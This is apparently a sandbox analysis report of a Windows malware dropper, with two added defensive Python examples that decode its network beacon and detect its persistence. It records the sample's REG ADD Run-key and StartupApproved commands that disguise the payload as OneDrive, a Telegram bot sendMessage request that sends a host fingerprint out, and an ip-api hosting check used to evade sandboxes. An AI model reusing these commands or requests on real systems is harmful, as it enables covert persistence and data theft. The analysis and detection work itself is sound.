Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe |
Virustotal: Detection: 39% |
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe |
ReversingLabs: Detection: 14% |
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_0040646B FindFirstFileA,FindClose, |
0_2_0040646B |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_004027A1 FindFirstFileA, |
0_2_004027A1 |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, |
0_2_004058BF |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00406F00 FindFirstFileA, |
11_2_00406F00 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_004364E3 FindFirstFileExW, |
11_2_004364E3 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
DNS query: name: ipinfo.io |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
DNS query: name: ipinfo.io |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
DNS query: name: ip-api.com |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Wed, 04 May 2022 09:04:58 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01 |
Source: AppLaunch.exe, 0000000B.00000002.455822807.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000003.454692399.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://api.telegram.org/botTELEG |
Source: AppLaunch.exe, 0000000B.00000002.456337506.0000000006C12000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://api.telegram.org/botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20N |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0 |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0 |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://crl.entrust.net/2048ca.crl0 |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://crl.entrust.net/ts1ca.crl0 |
Source: AppLaunch.exe, 0000000B.00000003.454466555.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.455882630.0000000000E68000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05 |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0: |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K |
Source: AppLaunch.exe, 00000019.00000002.797439121.0000000006A79000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000019.00000002.797490031.0000000006A8A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ip-api.com |
Source: AppLaunch.exe, 00000019.00000002.797439121.0000000006A79000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ip-api.com/line/?fields=hosting |
Source: AppLaunch.exe, 00000019.00000002.797439121.0000000006A79000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ip-api.com4bkX |
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ipinfo.io/json |
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ipinfo.io/json4 |
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ipinfo.io/jsonHt |
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://ipinfo.io/jsonxt |
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
String found in binary or memory: http://nsis.sf.net/NSIS_Error |
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://ocsp.digicert.com0C |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://ocsp.digicert.com0N |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://ocsp.entrust.net02 |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://ocsp.entrust.net03 |
Source: AppLaunch.exe, 00000019.00000002.797439121.0000000006A79000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://www.digicert.com/CPS0 |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://www.entrust.net/rpa0 |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: http://www.entrust.net/rpa03 |
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/ |
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000003.454466555.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.455882630.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.455822807.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000003.454692399.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20 |
Source: AppLaunch.exe, 0000000B.00000002.456337506.0000000006C12000.00000004.00000800.00020000.00000000.sdmp, json[1].json.11.dr |
String found in binary or memory: https://ipinfo.io/missingauth |
Source: [New]1.exe.0.dr, [New]Salvity_crypted(2).exe.0.dr |
String found in binary or memory: https://www.digicert.com/CPS0 |
Source: global traffic |
HTTP traffic detected: GET /botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.40%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20BOba%0A HTTP/1.1
Accept: text/*
User-Agent: soft
Host: api.telegram.org
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /json HTTP/1.1
Accept: text/*
User-Agent: soft
Host: ipinfo.io |
Source: global traffic |
HTTP traffic detected: GET /botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text=%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.40%0A%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20BOba%0A HTTP/1.1
Accept: text/*
User-Agent: soft
Host: api.telegram.org |
Source: global traffic |
HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive |
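The three requests above are the sample's whole first network touch: a public-IP lookup (ipinfo.io/json), an ip-api.com query restricted to the `hosting` field, which is true for datacenter and VPS address space and so doubles as a cheap sandbox check, and a Telegram Bot API sendMessage call whose `text` parameter is a percent-encoded host fingerprint (GPU, CPU, RAM, username, public IP, country and a build tag). Both Telegram requests still carry the literal strings TELEGRAM_APIKEY and TELEGRAM_CHATID where a bot token and chat id belong, so this build's exfiltration cannot succeed; the nginx 404 with a JSON body recorded earlier is consistent with that, although the report does not pair reply with request. The `User-Agent: soft` header on the ipinfo.io and Telegram requests is a usable network signature. The Python below is an added triage example, not part of the Joe Sandbox report or of the malware: it parses constructed copies of the three requests, labels each by purpose and decodes the beacon into fields. The bot-token format check is my assumption.

```python
"""Triage of the captured HTTP requests.

Added example, not part of the sandbox report. The three requests below are
constructed from the report's "HTTP traffic detected" lines; nothing is sent
to the network, and the field labels are parsed from the beacon text itself."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample input: the request lines the report shows, as raw HTTP/1.1.
SAMPLE_REQUESTS = [
    "GET /json HTTP/1.1\r\nAccept: text/*\r\nUser-Agent: soft\r\nHost: ipinfo.io\r\n\r\n",
    "GET /line/?fields=hosting HTTP/1.1\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\n\r\n",
    (
        "GET /botTELEGRAM_APIKEY/sendMessage?chat_id=TELEGRAM_CHATID&text="
        "%F0%9F%98%8E%20New%20worker%20connected!%0A%0A%E2%9D%97%EF%B8%8F%20Info:%20%0A"
        "%E2%80%94%20GPU:%20Microsoft%20Basic%20Display%20Adapter%0A"
        "%E2%80%94%20CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A"
        "%E2%80%94%20RAM:%208191%20MB%0A%0A%E2%9D%95%20Other%20info:%0A"
        "%E2%80%94%20Username:%20user%0A%E2%80%94%20IP:%20102.129.143.40%0A"
        "%E2%80%94%20Country:%20CH%0A%E2%80%94%20Build%20tag:%20BOba%0A HTTP/1.1\r\n"
        "Accept: text/*\r\nUser-Agent: soft\r\nHost: api.telegram.org\r\nConnection: Keep-Alive\r\n\r\n"
    ),
]

TELEGRAM_PATH = re.compile(r"^/bot(?P<token>[^/]+)/(?P<method>\w+)$")
# Real bot tokens look like "<bot id>:<35-char secret>"; anything else is a placeholder
# left by the builder (the exact length is my assumption, hence the loose lower bound).
REAL_TOKEN = re.compile(r"^\d+:[A-Za-z0-9_-]{30,}$")
BULLET = "\u2014"  # the beacon prefixes each data line with an em dash


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, host, path, query and headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)   # request target carries no spaces
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return {"method": method, "host": headers.get("host", ""), "path": parts.path,
            "query": parse_qs(parts.query), "headers": headers}


def classify(req):
    """Label each request by what the malware uses it for."""
    fields = req["query"].get("fields", [""])[0].split(",")
    if req["host"] == "api.telegram.org" and req["path"].startswith("/bot"):
        return "exfil:telegram-bot-api"
    if req["host"] == "ip-api.com" and "hosting" in fields:
        return "evasion:hosting-ip-check"   # datacenter/VPS egress usually means a sandbox
    if req["host"] in ("ipinfo.io", "ip-api.com"):
        return "recon:public-ip-lookup"
    return "unclassified"


def decode_telegram_beacon(req):
    """Pull token, chat id and the 'Key: value' host fingerprint out of a sendMessage call."""
    m = TELEGRAM_PATH.match(req["path"])
    if req["host"] != "api.telegram.org" or not m:
        return None
    fields = {}
    for line in req["query"].get("text", [""])[0].splitlines():
        if not line.startswith(BULLET):
            continue                      # headline and section titles carry no data
        key, sep, value = line[1:].strip().partition(": ")
        if sep:
            fields[key] = value.strip()
    token = m.group("token")
    return {"bot_token": token, "api_method": m.group("method"),
            "chat_id": req["query"].get("chat_id", [""])[0],
            "placeholder_credentials": REAL_TOKEN.match(token) is None,
            "fields": fields}


def triage(raw_requests):
    """Return one finding per request: label, host, user agent and decoded beacon if any."""
    out = []
    for raw in raw_requests:
        req = parse_request(raw)
        out.append({"label": classify(req), "host": req["host"],
                    "user_agent": req["headers"].get("user-agent"),
                    "beacon": decode_telegram_beacon(req)})
    return out


if __name__ == "__main__":
    for finding in triage(SAMPLE_REQUESTS):
        print(finding["label"], finding["host"], finding["user_agent"])
        if finding["beacon"]:
            for k, v in finding["beacon"]["fields"].items():
                print("   ", k, "=", v)
```

Run as a script it prints the label for each request and the decoded fields of the beacon. The `fields` dict is what you would forward as host indicators; note that the IP and country in this capture describe the sandbox's egress, not a victim.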
Source: [New]1.exe, 00000009.00000002.428693209.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> |
|
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, |
0_2_0040535C |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, |
0_2_00403348 |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_00406945 |
0_2_00406945 |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_0040711C |
0_2_0040711C |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00401000 |
11_2_00401000 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_004031B0 |
11_2_004031B0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_0042F090 |
11_2_0042F090 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_0042F2C2 |
11_2_0042F2C2 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_0042C500 |
11_2_0042C500 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_0042F51F |
11_2_0042F51F |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_0042A59B |
11_2_0042A59B |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_0043E70F |
11_2_0043E70F |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_0043585E |
11_2_0043585E |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_0043597E |
11_2_0043597E |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00427990 |
11_2_00427990 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00439F59 |
11_2_00439F59 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_00A138DD |
21_2_00A138DD |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_009FF3D3 |
21_2_009FF3D3 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_00A023D0 |
21_2_00A023D0 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_00A11C9A |
21_2_00A11C9A |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_00A0858C |
21_2_00A0858C |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_009FF605 |
21_2_009FF605 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_00A137BD |
21_2_00A137BD |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011CC370 |
25_2_011CC370 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011CE2D0 |
25_2_011CE2D0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C1479 |
25_2_011C1479 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C0858 |
25_2_011C0858 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C0B30 |
25_2_011C0B30 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C1D71 |
25_2_011C1D71 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011CCC40 |
25_2_011CCC40 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011CC028 |
25_2_011CC028 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C20A8 |
25_2_011C20A8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C10A9 |
25_2_011C10A9 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C1570 |
25_2_011C1570 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C0B20 |
25_2_011C0B20 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C0B6A |
25_2_011C0B6A |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_011C1E21 |
25_2_011C1E21 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_09567530 |
25_2_09567530 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 25_2_09567520 |
25_2_09567520 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: String function: 009FAE40 appears 33 times |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: String function: 00425540 appears 41 times |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: String function: 00430E17 appears 167 times |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe |
Source: 68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: unknown |
Process created: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe "C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe" |
|
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Process created: C:\Users\user\AppData\Roaming\[New]1.exe C:\Users\user\AppData\Roaming\[New]1.exe |
|
Source: C:\Users\user\AppData\Roaming\[New]1.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Roaming\[New]1.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 020000000000000000000000 |
|
Source: C:\Windows\SysWOW64\reg.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\reg.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Process created: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
|
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
|
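The process tree shows the NSIS installer dropping two crypted payloads into %APPDATA%, each starting the .NET host AppLaunch.exe, and AppLaunch.exe then spawning reg.exe twice: once to add a Run value named OneDrive pointing at the dropped C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe (the folder the real OneDrive client uses; a Secur32.dll is dropped beside it, which is consistent with DLL search-order hijacking, though the report does not show it being loaded), and once to write Explorer's StartupApproved\Run mirror with 02 00 00 00 00 00 00 00 00 00 00 00. As I understand that format, a first DWORD of 0x02 means enabled in Task Manager's Startup tab and 0x03 means disabled, with the time of disabling following as a FILETIME; the second write therefore pre-approves the entry so the user never sees it flagged. The Python below is an added detection example, not the report's or the malware's code: it runs over constructed process-creation events copied from the tree, parses the REG ADD command lines, decodes the StartupApproved blob and joins the two writes by value name.

```python
"""Run-key persistence written through reg.exe.

Added example, not part of the sandbox report. The events below are constructed
from the report's process tree; in production the same logic would run over
Sysmon Event ID 1 or Windows Security 4688 process-creation records."""
import re
from datetime import datetime, timedelta, timezone

# Constructed sample input reproducing the reg.exe launches the report lists.
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\user\AppData\Roaming\[New]1.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"},
    {"parent": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe",
     "image": r"C:\Windows\SysWOW64\reg.exe",
     "cmdline": r"REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive "
                r"/t REG_SZ /f /d C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},
    {"parent": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe",
     "image": r"C:\Windows\SysWOW64\reg.exe",
     "cmdline": r"REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run "
                r"/v OneDrive /t REG_BINARY /f /d 020000000000000000000000"},
]

REG_ADD = re.compile(r'^\s*(?:\S*\\)?reg(?:\.exe)?\s+add\s+(?P<key>"[^"]+"|\S+)(?P<rest>.*)$', re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce|Explorer\\StartupApproved\\Run)$", re.I)
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_reg_add(cmdline):
    """Return key, value name, type, data and /f for a 'REG ADD' command line, else None."""
    m = REG_ADD.match(cmdline)
    if not m:
        return None
    out = {"key": m.group("key").strip('"'), "name": None, "type": None, "data": None, "force": False}
    tokens = re.findall(r'"[^"]*"|\S+', m.group("rest"))   # keep quoted arguments whole
    i = 0
    while i < len(tokens):
        opt = tokens[i].lower()
        if opt == "/f":
            out["force"] = True
            i += 1
        elif opt in ("/v", "/t", "/d") and i + 1 < len(tokens):
            out[{"/v": "name", "/t": "type", "/d": "data"}[opt]] = tokens[i + 1].strip('"')
            i += 2
        else:
            i += 1
    return out


def decode_startup_approved(hex_data):
    """Decode Explorer's 12-byte StartupApproved blob.

    Bytes 0-3: state, 0x02 = enabled (0x06 is also seen for enabled), 0x03 = disabled.
    Bytes 4-11: FILETIME of when the user disabled it, all zero while enabled."""
    blob = bytes.fromhex(hex_data)
    if len(blob) != 12:
        raise ValueError("StartupApproved values are 12 bytes long")
    state = int.from_bytes(blob[:4], "little")
    filetime = int.from_bytes(blob[4:], "little")
    disabled_at = FILETIME_EPOCH + timedelta(microseconds=filetime // 10) if filetime else None
    return {"state": state, "enabled": state in (2, 6), "disabled_at": disabled_at}


def detect_run_key_persistence(events):
    """Flag every reg.exe ADD into a Run/RunOnce key or its StartupApproved mirror."""
    findings = []
    for ev in events:
        if not ev["image"].lower().endswith("\\reg.exe"):
            continue
        op = parse_reg_add(ev["cmdline"])
        if not op or not RUN_KEY.search(op["key"]):
            continue
        approved = None
        if "startupapproved" in op["key"].lower() and (op["type"] or "").upper() == "REG_BINARY":
            approved = decode_startup_approved(op["data"])["enabled"]
        findings.append({"parent": ev["parent"], "key": op["key"], "name": op["name"],
                         "data": op["data"], "approved": approved})
    return findings


def correlate(findings):
    """Join each Run value with its StartupApproved state by value name."""
    by_name = {}
    for f in findings:
        entry = by_name.setdefault(f["name"], {"command": None, "approved": None, "parents": set()})
        entry["parents"].add(f["parent"])
        if f["approved"] is None:
            entry["command"] = f["data"]
        else:
            entry["approved"] = f["approved"]
    return by_name


if __name__ == "__main__":
    for name, entry in correlate(detect_run_key_persistence(SAMPLE_EVENTS)).items():
        print(f"{name}: {entry['command']} (approved={entry['approved']}) "
              f"written by {sorted(entry['parents'])}")
```

The parent image is kept in each finding on purpose: a Run-key write by reg.exe whose parent is a .NET framework host such as AppLaunch.exe, rather than an installer or an interactive shell, is the part of this tree that a rule should key on.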
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
